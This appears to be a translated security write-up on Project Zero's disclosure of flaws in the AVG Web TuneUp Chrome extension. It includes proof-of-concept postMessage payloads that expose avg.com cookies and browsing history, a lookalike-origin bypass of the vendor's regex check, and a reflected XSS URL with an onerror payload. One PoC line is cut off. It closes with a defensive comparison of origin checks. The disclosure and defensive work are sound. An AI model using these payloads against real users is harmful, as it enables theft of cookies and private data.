AVG Web TuneUp, a Google Chrome plug-in, has multiple high-risk vulnerabilities affecting 9 million users
On August 15 this year, Tavis, a member of Google's Project Zero, reported multiple vulnerabilities in the Google Chrome plug-in AVG Web TuneUp. The plug-in has approximately 9 million active users, so the impact is broad.
The plug-in adds many APIs that operate on Chrome, for example to hijack the search box and new tabs with ease. Because of its convoluted installation process, it slips past Chrome's malware checks, in particular Chrome's policy against abuse of extension APIs.
Many of these APIs are in fact flawed. An attacker can craft a payload that steals the user's avg.com cookies and reads their browsing history and other private data; arbitrary command execution may even be possible.
Attack methods
In his e-mail to the vendor, Tavis listed several attack methods. The "navigate" API yields a classic cross-origin XSS: attacker.com can read a visitor's mail.google.com e-mails, or data from any other site, across domains.
for (i = 0; i
The code above is the PoC provided by Tavis.
It uses window.postMessage (the JavaScript API for cross-origin communication) to send requests to the AVG Web TuneUp plug-in in a loop. Each request carries the following data:
{origin: "web", action: "navigate", data: {url: "javascript:document.location.hostname.endsWith('.avg.com')" + "?" + "alert(document.domain + ':' + document.cookie)" + ":" + "false", tabID: i}}
Whenever one of the user's tabs is on an avg.com site, the hostname and cookie of that .avg.com site are exposed. The "recently" API exposes the current user's browsing history.
window.addEventListener("message", receiveMessage, false);
window.postMessage({from: "web", to: "content", method: "recently"}, "*");
function receiveMessage(event)
{
  if (event.data != undefined && event.data.historyItems != undefined) {
    var obj = JSON.parse(event.data.historyItems);
    document.write("Here is a list of websites you've been visiting");
    document.write("<br>");
    for (i in obj) {
      var d = new Date(obj[i]);
      document.write("" + i + " on " + d);
      document.write("<br>");
    }
  }
}
The code above is the PoC provided by Tavis.
It uses window.postMessage to call the plug-in's "recently" API, which returns the current user's browsing history; a local message listener receives the returned data and writes it to the page.
The vendor then fixed the issue, but the fix was incorrect and Tavis bypassed it. The patched code added the following check:
var match = event.origin.match(/https?:\/\/.*\.avg\.com/i);
if (match != null) {
  ...
}
This only tests whether the origin contains ".avg.com" somewhere, which is easy to bypass: an origin such as https://www.avg.com.www.attacker.com passes the check, so both attacks above still work. The regex also accepts plain http as well as https, which exposes the check to man-in-the-middle attacks.
The vendor fixed it again. This time the origin must be "mysearch.avg.com" or "webtuneup.avg.com". However, the following XSS on webtuneup.avg.com can still steal user data:
http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=%3Cimg%20src=x%20onerror=alert(1)%3E&searchParams=%7B%22lang%22%3A%22en%22%2C%22pid%22%3A%22pid%22%2C%22v%22%3A%22vv%22%7D
The problem is fixed in AVG Web TuneUp version 4.2.5.169, which can be installed as an upgrade from the store.
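The following is an added example, not AVG's code or Tavis's PoC. It places the substring-regex origin check described above next to an exact-origin allowlist, the way a defender would validate event.origin in a postMessage handler, and runs both against constructed sample origins (the legitimate host, the lookalike domain from the write-up, a plain-http origin and a malformed string). The two allowed hostnames are taken from the write-up; the helper names are this example's own.

```javascript
// Added example (not AVG's code): weak substring origin check vs. exact allowlist.

// Weak check: only requires ".avg.com" to appear somewhere in the origin and
// accepts plain http as well as https.
function weakOriginCheck(origin) {
  const match = origin.match(/https?:\/\/.*\.avg\.com/i);
  return match !== null;
}

// Hardened check: compare the complete serialized origin (scheme + host) against
// an exact allowlist of https origins. Hostnames are those named in the write-up.
const ALLOWED_ORIGINS = new Set([
  "https://mysearch.avg.com",
  "https://webtuneup.avg.com",
]);

function strictOriginCheck(origin) {
  // Parse with the URL API so that anything that is not a clean
  // scheme://host[:port] is rejected before the comparison.
  let parsed;
  try {
    parsed = new URL(origin);
  } catch (e) {
    return false;
  }
  // A real event.origin never carries a path, query or credentials; if
  // re-serializing changed the string, the input was not a bare origin.
  if (parsed.origin !== origin) return false;
  return ALLOWED_ORIGINS.has(parsed.origin);
}

// Constructed sample origins for the comparison.
const SAMPLE_ORIGINS = [
  "https://webtuneup.avg.com",              // legitimate
  "https://www.avg.com.www.attacker.com",   // lookalike from the write-up
  "http://webtuneup.avg.com",               // plain http (MITM-forgeable)
  "https://webtuneup.avg.com/evil",         // not a bare origin
  "not a url",
];

// Returns [origin, weakResult, strictResult] for each sample.
function compareChecks() {
  return SAMPLE_ORIGINS.map((o) => [o, weakOriginCheck(o), strictOriginCheck(o)]);
}

// A message handler that drops untrusted senders before touching event.data.
function makeMessageHandler(handle) {
  return function (event) {
    if (!strictOriginCheck(event.origin)) return;
    handle(event.data);
  };
}

// Stand-alone run: print the comparison table.
for (const row of compareChecks()) console.log(row.join("  "));
```

The lookalike origin passes weakOriginCheck because the regex matches its "https://www.avg.com" prefix and ignores the rest of the hostname; strictOriginCheck rejects it, rejects the http variant, and rejects anything that is not a bare origin, which is the shape of the vendor's eventual fix.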